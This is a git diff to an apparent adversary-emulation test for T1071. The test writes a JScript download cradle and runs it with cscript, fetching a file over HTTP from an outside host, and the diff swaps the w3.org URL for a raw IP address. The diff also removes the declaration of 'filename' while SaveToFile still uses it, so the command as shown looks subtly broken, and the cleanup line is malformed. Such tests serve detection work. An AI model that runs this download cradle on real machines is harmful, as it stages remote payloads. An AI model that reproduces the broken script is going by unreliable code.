diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md index ff74708f..bdcea45a 100644 --- a/atomics/T1071/T1071.md +++ b/atomics/T1071/T1071.md @@ -242,20 +242,18 @@ Uses cscript //E:jscript to download a file | Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js| -| file_url | URL to retrieve file from | Url | https://www.w3.org/TR/PNG/iso_8859-1.txt| -| out_file | File to download payload to | Path | T1071-Out.txt| +| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt| #### Attack Commands: Run with `command_prompt`! ``` -echo var url = "#{file_url}", filename = "#{out_file}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file} +echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file} cscript //E:Jscript #{script_file} ``` #### Cleanup Commands: ``` del #{script_file} /F /Q -del #{out_file} /F /Q ``` diff --git a/atomics/index.yaml b/atomics/index.yaml index e4323de6..ecca15ad 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -27961,18 +27961,16 @@ command-and-control: file_url: description: URL to retrieve file from type: Url - default: https://www.w3.org/TR/PNG/iso_8859-1.txt - out_file: - description: File to download payload to - type: Path - default: T1071-Out.txt + default: https://128.30.52.100/TR/PNG/iso_8859-1.txt executor: name: command_prompt elevation_required: false command: | - echo var url = "#{file_url}", filename = "#{out_file}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file} + echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file} cscript //E:Jscript #{script_file} - cleanup_command: "del #{script_file} /F /Q\ndel #{out_file} /F /Q " + cleanup_command: 'del #{script_file} /F /Q + +' T1032: technique: x_mitre_data_sources: